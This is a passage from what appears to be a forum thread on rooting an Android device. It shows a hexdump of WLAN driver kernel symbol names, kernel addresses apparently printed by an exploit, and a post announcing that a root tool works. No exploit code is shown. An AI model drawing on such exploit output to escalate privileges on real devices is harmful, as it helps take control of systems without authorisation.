00000d50 6b 52 6f 61 6d 53 63 61 6e 4f 66 66 6c 6f 61 64 |kRoamScanOffload|
00000d60 50 61 72 61 6d 73 00 6c 69 6d 50 72 6f 63 65 73 |Params.limProces|
00000d70 73 42 65 61 63 6f 6e 46 72 61 6d 65 4e 6f 53 65 |sBeaconFrameNoSe|
00000d80 73 73 69 6f 6e 00 57 4c 41 4e 54 4c 5f 48 53 42 |ssion.WLANTL_HSB|
00000d90 4d 50 53 52 53 53 49 52 65 67 69 6f 6e 43 68 61 |MPSRSSIRegionCha|
00000da0 6e 67 65 64 4e 6f 74 69 66 69 63 61 74 69 6f 6e |ngedNotification|
00000db0 00 73 6d 65 5f 48 61 6e 64 6c 65 43 68 61 6e 67 |.sme_HandleChang|
00000dc0 65 43 6f 75 6e 74 72 79 43 6f 64 65 42 79 43 6f |eCountryCodeByCo|
00000dd0 72 65 00 76 6f 73 5f 66 65 74 63 68 5f 74 6c 5f |re.vos_fetch_tl_|
00000de0 63 66 67 5f 70 61 72 6d 73 00 57 44 49 5f 44 65 |cfg_parms.WDI_De|
00000df0 6c 42 41 52 65 71 00 5f 5f 77 6c 61 6e 5f 68 64 |lBAReq.__wlan_hd|
00000e00 64 5f 64 65 6c 5f 76 69 72 74 75 61 6c 5f 69 6e |d_del_virtual_in|
00000e10 74 66 00 73 79 73 42 75 69 6c 64 4d 65 73 73 61 |tf.sysBuildMessa|
00000e20 67 65 48 65 61 64 65 72 00 70 61 6c 53 65 6d 61 |geHeader.palSema|
00000e30 70 68 6f 72 65 47 69 76 65 00 73 6d 65 5f 47 65 |phoreGive.sme_Ge|
00000e40 74 43 75 72 72 65 6e 74 43 6f 75 6e 74 72 79 43 |tCurrentCountryC|
00000e50 6f 64 65 00 73 6d 65 5f 53 74 61 72 74 00 70 6d |ode.sme_Start.pm|
00000e60 63 53 74 6f 70 55 61 70 73 64 00 64 6f 74 31 31 |cStopUapsd.dot11|
00000e70 66 55 6e 70 61 63 6b 54 44 4c 53 44 69 73 52 65 |fUnpackTDLSDisRe|
00000e80 71 00 57 44 49 5f 50 72 6f 63 65 73 73 45 78 69 |q.WDI_ProcessExi|
00000e90 74 42 6d 70 73 52 73 70 00 76 6f 73 5f 6e 76 5f |tBmpsRsp.vos_nv_|
00000ea0 67 65 74 56 61 6c 69 64 69 74 79 00 57 44 49 5f |getValidity.WDI_|
00000eb0 50 72 6f 63 65 73 73 55 70 64 61 74 65 53 63 61 |ProcessUpdateSca|
00000ec0 6e 50 61 72 61 6d 73 52 73 70 00 73 61 70 53 65 |nParamsRsp.sapSe|
00000ed0 74 4f 70 65 72 61 74 69 6e 67 43 68 61 6e 6e 65 |tOperatingChanne|
00000ee0 6c 00 64 6f 74 31 31 66 55 6e 70 61 63 6b 49 65 |l.dot11fUnpackIe|
00000ef0 4d 65 61 73 75 72 65 6d 65 6e 74 52 65 71 75 65 |MeasurementReque|
00000f00 73 74 00 57 44 49 5f 50 72 6f 63 65 73 73 52 65 |st.WDI_ProcessRe|
00000f10 6d 42 65 61 63 6f 6e 46 69 6c 74 65 72 52 73 70 |mBeaconFilterRsp|
00000f20 00 76 6f 73 5f 6d 65 6d 5f 76 6d 61 6c 6c 6f 63 |.vos_mem_vmalloc|
00000f30 00 64 6f 74 31 31 66 50 61 63 6b 49 65 4c 6f 61 |.dot11fPackIeLoa|
00000f40 64 42 61 6c 61 6e 63 65 00 68 64 64 5f 74 78 5f |dBalance.hdd_tx_|
00000f50 63 6f 6d 70 6c 65 74 65 5f 63 62 6b 00 57 44 49 |complete_cbk.WDI|
00000f60 5f 50 72 6f 63 65 73 73 55 6e 6b 41 64 64 72 46 |_ProcessUnkAddrF|
00000f70 72 61 6d 65 49 6e 64 00 57 44 41 5f 55 70 64 61 |rameInd.WDA_Upda|
00000f80 74 65 50 72 6f 62 65 52 73 70 50 61 72 61 6d 73 |teProbeRspParams|
00000f90 43 61 6c 6c 62 61 63 6b 00 63 73 72 54 64 6c 73 |Callback.csrTdls|
00000fa0 50 72 6f 63 65 73 73 44 65 6c 53 74 61 00 57 44 |ProcessDelSta.WD|
00000fb0 49 5f 50 72 6f 63 65 73 73 45 58 54 53 63 61 6e |I_ProcessEXTScan|
00000fc0 53 65 74 48 6f 74 6c 69 73 74 42 53 53 49 44 52 |SetHotlistBSSIDR|
00000fd0 73 70 00 68 64 64 5f 73 65 74 5f 70 72 65 5f 63 |sp.hdd_set_pre_c|
00000fe0 6c 6f 73 65 00 68 64 64 5f 67 65 74 5f 63 6f 6e |lose.hdd_get_con|
00000ff0 63 75 72 72 65 6e 63 79 5f 6d 6f 64 65 00 77 6c |currency_mode.wl|
tasklist = ffffffc097df7ca0
current_ptr = ffffffc094b61980
---------- Post added at 03:28 AM ---------- Previous post was at 02:44 AM ----------
GUYS WE HAVE ROOT. ARPRUSS su98 works!!!!!!!!!!!